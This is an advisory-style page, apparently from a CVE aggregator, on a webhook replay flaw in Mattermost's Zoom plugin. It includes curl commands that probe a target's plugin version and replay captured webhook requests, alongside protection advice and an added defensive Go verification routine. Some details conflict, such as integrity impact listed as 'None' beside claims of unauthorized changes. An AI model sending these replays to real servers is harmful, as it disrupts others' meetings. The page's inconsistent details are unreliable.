CVE-2026-3109: Intro
CVE-2026-3109 is a low‑severity vulnerability affecting Mattermost Plugins versions 11.4 and earlier, as well as 10.11.11.0 and earlier. The root cause lies in the Zoom webhook handler, where incoming requests are not checked for a valid, recent timestamp. As a result, an attacker can capture a legitimate Zoom webhook request and replay it later. Because the plugin does not verify the request’s freshness, each replayed request is accepted as valid, allowing the attacker to repeatedly manipulate the state of a Zoom meeting integrated into Mattermost. This can lead to unauthorized configuration changes or the disabling of meetings. The weakness is classified as CWE-754 (Improper Check for Unusual or Exceptional Conditions). The CVSS 3.1 vector is CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L, giving a base score of 2.2 (Low). Attack complexity is high, and privileges are required, but no user interaction is needed. Exploitation would typically involve sending replayed webhook requests to the vulnerable Mattermost instance over the Internet via the Zoom API. While the direct impact per meeting is limited, the ability to repeatedly manipulate meeting state poses a moderate operational risk. The CVE was published on March 26, 2026, and the Mattermost advisory ID is MMSA-2026-00584. The public disclosure of the CVE was made by a researcher identified as “thecybertantrik”. Mattermost has released patches in versions 11.5.0 and 10.11.12, which enforce timestamp validation for Zoom webhook calls.
DailyCVE Form
Platform: Mattermost Plugins
Version: ≤11.4/10.11.11.0
Vulnerability: Replay Attack
Severity: Low
Date: 2026-03-26
Prediction: 2026-03-26
What Undercode Say
Identify vulnerable plugin version
curl -s http://target-mattermost.com/api/v4/plugins | jq '.[] | select(.id | contains("zoom")) | .manifest.version'
Check if plugin validates timestamps (no validation = vulnerable)
grep -r "X-Zoom-Request-Timestamp" /path/to/plugin/
Simulate a replayed webhook request (capture a valid Zoom webhook)
curl -X POST http://target-mattermost.com/plugins/zoom/webhook \
-H "Content-Type: application/json" \
-d '{"event":"meeting.participant_joined","payload":{"account_id":"xyz"}}'
Replay the captured request immediately
curl -X POST http://target-mattermost.com/plugins/zoom/webhook \
-H "Content-Type: application/json" \
-d '{"event":"meeting.participant_joined","payload":{"account_id":"xyz"}}'
Exploit
- An attacker with network access to a vulnerable Mattermost instance (<11.5.0 or <10.11.12) intercepts a legitimate Zoom webhook request directed at the `/plugins/zoom/webhook` endpoint.
- The attacker captures the exact request payload and headers.
- Because the plugin does not check the request’s timestamp, the attacker can immediately replay the captured request.
- Each replayed request is accepted as valid, causing the associated Zoom meeting state (e.g., participant list, recording status) to be repeatedly updated.
- The attacker can corrupt or disable meeting functions by replaying requests that contain meeting‑altering commands (e.g., meeting.ended).
Protection
- Upgrade immediately to Mattermost Plugins version 11.5.0, 10.11.12, or higher.
- If upgrading is not possible, disable the Zoom plugin or block access to the `/plugins/zoom/webhook` endpoint from untrusted networks.
- Monitor logs for repeated identical webhook requests to the Zoom endpoint, which may indicate replay attacks.
- Use API gateways or WAFs with request‑replay detection and timestamp‑based policies.
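As an added illustration of the fix described above (timestamp validation on Zoom webhook calls), and not code from the Mattermost plugin or from Undercode, the Go guard below rejects stale requests and, going one step beyond the page's fix, also refuses an exact duplicate of a request already accepted inside the freshness window. The header scheme (timestamp in Unix milliseconds; signature `v0=` plus the hex HMAC-SHA256 over `v0:<ts>:<body>`) is assumed from Zoom's public webhook verification documentation, and `ReplayGuard`, `Verify` and `Sign` are names chosen here.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"strconv"
	"time"
)

// Assumed scheme (Zoom's public webhook docs, not this page): sig header is
// "v0=" + hex(HMAC-SHA256(secret, "v0:<ts>:<body>")), ts is Unix milliseconds.
var ErrStale, ErrBadSig, ErrReplayed = errors.New("stale timestamp"), errors.New("bad signature"), errors.New("replayed request")
// ReplayGuard keeps the freshness window and the signatures accepted inside it.
type ReplayGuard struct {
	Window time.Duration
	seen   map[string]time.Time
}

func NewReplayGuard(w time.Duration) *ReplayGuard { return &ReplayGuard{Window: w, seen: map[string]time.Time{}} }
// Verify is the check the vulnerable handler lacked: reject stale timestamps, bad HMACs, and exact replays.
func (g *ReplayGuard) Verify(secret, ts, sig string, body []byte, now time.Time) error {
	ms, err := strconv.ParseInt(ts, 10, 64)
	if d := now.Sub(time.UnixMilli(ms)); err != nil || d > g.Window || d < -g.Window {
		return ErrStale
	}
	if _, want := Sign(secret, time.UnixMilli(ms), body); !hmac.Equal([]byte(want), []byte(sig)) {
		return ErrBadSig
	}
	for k, t := range g.seen { // evict entries that fell out of the window
		if now.Sub(t) > g.Window {
			delete(g.seen, k)
		}
	}
	if _, dup := g.seen[sig]; dup {
		return ErrReplayed
	}
	g.seen[sig] = now
	return nil
}

// Sign builds the timestamp and signature headers a legitimate sender attaches.
func Sign(secret string, sent time.Time, body []byte) (ts, sig string) {
	ts = strconv.FormatInt(sent.UnixMilli(), 10)
	mac := hmac.New(sha256.New, []byte(secret))
	mac.Write([]byte("v0:" + ts + ":"))
	mac.Write(body)
	return ts, "v0=" + hex.EncodeToString(mac.Sum(nil))
}
```

A freshness window alone still accepts a capture replayed within that window, which is why the guard also remembers accepted signatures until they expire.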
Impact
- Confidentiality: None – the vulnerability does not expose data.
- Integrity: None – the replayed requests do not alter data.
- Availability: Low – replay attacks can temporarily corrupt Zoom meeting state or disable meetings, but do not crash the system.
- Operational risk: Moderate, due to the ability to repeatedly disrupt integrated Zoom meetings.
- EPSS score: 0.02% (very low exploit probability in the next 30 days).
Sources:
Reported By: nvd.nist.gov